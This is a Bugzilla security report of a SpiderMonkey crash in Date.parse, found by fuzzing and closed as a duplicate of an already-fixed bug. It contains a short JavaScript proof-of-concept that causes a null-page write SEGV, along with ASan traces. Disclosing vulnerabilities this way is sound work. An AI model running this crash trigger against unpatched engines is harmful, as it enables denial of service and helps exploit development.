Closed
Bug 1872633
Opened 5 months ago
Closed 5 months ago
Spidermonkey: SEGV at /js/src/jsdate.cpp:1100:5 in bool MatchesKeyword<unsigned char>(unsigned char const*, unsigned long, char const*)
Categories
(Core :: JavaScript Engine: JIT, defect)
Core
JavaScript Engine: JIT
Tracking
()
RESOLVED
DUPLICATE
of bug 1872550
People
(Reporter: baksmali404, Unassigned)
Details
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Steps to reproduce:
version:master
$ git clone https://github.com/mozilla/gecko-dev
$ cd gecko-dev
$ git show
commit 05178ae3d8ed27d47b340094de52bd3f572a5e1d (HEAD -> master, origin/master, origin/HEAD)
Author: ffxbld <ffxbld@mozilla.com>
Date: Thu Dec 21 13:00:04 2023 +0000
Reproduce
./dist/bin/js pocfile.js
pocfile.js
function f1() {
return "zMb";
}
const v4 = [Date,Date,Date,Date,Date];
v4.toString = f1;
const v5 = [2147483649,v4];
class C6 extends Date {
}
C6.parse(v5);
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
// Assertion failure: IsAsciiLowercaseAlpha(*keyword), at /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100
// #01: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x256c987]
// #02: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x25714e4]
// #03: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x1cae707]
// #04: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x1cad963]
// #05: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x2aff8d5]
// #06: ??? (???:???)
// STDOUT:
//
// FUZZER ARGS: .build/x86_64-unknown-linux-gnu/release/FuzzilliCli --profile=spidermonkey --storagePath=Targets/Spidermonkey/out3 /home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js --resume
// TARGET ARGS: /home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js --baseline-warmup-threshold=10 --ion-warmup-threshold=100 --ion-check-range-analysis --ion-extra-checks --fuzzing-safe --disable-oom-functions --reprl
// CONTRIBUTORS: IntegerGenerator, TrivialFunctionGenerator, StringGenerator, ProbingMutator
// EXECUTION TIME: 30ms
gc();
Actual results:
asan report
Assertion failure: IsAsciiLowercaseAlpha(*keyword), at /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100
#01: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x3ef6892]
#02: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x3efda33]
#03: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2e5d82f]
#04: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2df00e9]
#05: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2e1c7c1]
#06: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2deeeed]
#07: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2dee007]
#08: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2df6db5]
#09: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2df7acf]
#10: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x320189c]
#11: JS_ExecuteScript(JSContext*, JS::Handle<JSScript*>)[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x3201e9e]
#12: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2bfa837]
#13: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2bf8561]
#14: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2b44a02]
#15: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2b37d79]
#16: ???[/lib/x86_64-linux-gnu/libc.so.6 +0x29d90]
#17: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x29e40]
#18: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2a3a0c9]
#19: ??? (???:???)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2219029==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55be60b7f8c7 bp 0x7ffe1119d290 sp 0x7ffe1119d0a0 T0)
==2219029==The signal is caused by a WRITE memory access.
==2219029==Hint: address points to the zero page.
#0 0x55be60b7f8c7 in bool MatchesKeyword<unsigned char>(unsigned char const*, unsigned long, char const*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100:5
#1 0x55be60b7f8c7 in bool ParseDate<unsigned char>(js::DateTimeInfo::ForceUTC, unsigned char const*, unsigned long, JS::ClippedTime*, bool*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1724:14
#2 0x55be60b7f8c7 in ParseDate(js::DateTimeInfo::ForceUTC, JSLinearString*, JS::ClippedTime*, JSContext*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1877:21
#3 0x55be60b86a32 in date_parse(JSContext*, unsigned int, JS::Value*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1912:8
#4 0x55be5fae682e in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:479:13
#5 0x55be5fa790e8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:573:12
#6 0x55be5faa57c0 in js::CallFromStack(JSContext*, JS::CallArgs const&, js::CallReason) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:645:10
#7 0x55be5faa57c0 in js::Interpret(JSContext*, js::RunState&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:3060:16
#8 0x55be5fa77eec in MaybeEnterInterpreterTrampoline(JSContext*, js::RunState&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:393:10
#9 0x55be5fa77006 in js::RunScript(JSContext*, js::RunState&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:451:13
#10 0x55be5fa7fdb4 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JS::Handle<JSObject*>, js::AbstractFramePtr, JS::MutableHandle<JS::Value>) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:838:13
#11 0x55be5fa80ace in js::Execute(JSContext*, JS::Handle<JSScript*>, JS::Handle<JSObject*>, JS::MutableHandle<JS::Value>) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:870:10
#12 0x55be5fe8a89b in ExecuteScript(JSContext*, JS::Handle<JSObject*>, JS::Handle<JSScript*>, JS::MutableHandle<JS::Value>) /home/gandalf/fuzz/gecko-dev/js/src/vm/CompilationAndEvaluation.cpp:494:10
#13 0x55be5fe8ae9d in JS_ExecuteScript(JSContext*, JS::Handle<JSScript*>) /home/gandalf/fuzz/gecko-dev/js/src/vm/CompilationAndEvaluation.cpp:518:10
#14 0x55be5f883836 in RunFile(JSContext*, char const*, _IO_FILE*, CompileUtf8, bool, bool) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:1220:10
#15 0x55be5f881560 in Process(JSContext*, char const*, bool, FileKind) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp
#16 0x55be5f7cda01 in ProcessArgs(JSContext*, js::cli::OptionParser*) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:10875:10
#17 0x55be5f7cda01 in Shell(JSContext*, js::cli::OptionParser*) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:11137:12
#18 0x55be5f7c0d78 in main /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:11534:12
#19 0x7efd9b029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#20 0x7efd9b029e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#21 0x55be5f6c30c8 in _start (/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js+0x2a3a0c8) (BuildId: c91ffe657845bd1ebd727cef4df11b4e)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100:5 in bool MatchesKeyword<unsigned char>(unsigned char const*, unsigned long, char const*)
==2219029==ABORTING
Expected results:
SEGV or crash
Credit:
Gandalf4a of PKU-Changsha Institute for Computing and Digital Economy
|
||
Updated•5 months ago
|
Group: core-security → javascript-core-security
|
||
Comment 2•5 months ago
|
||
yes, this is a dupe, and fixed by the patch there.
Status: UNCONFIRMED → RESOLVED
Closed: 5 months ago
Duplicate of bug: 1872550
Flags: needinfo?(arai.unmht)
Resolution: --- → DUPLICATE
|
|
||
Updated•5 months ago
|
Group: javascript-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•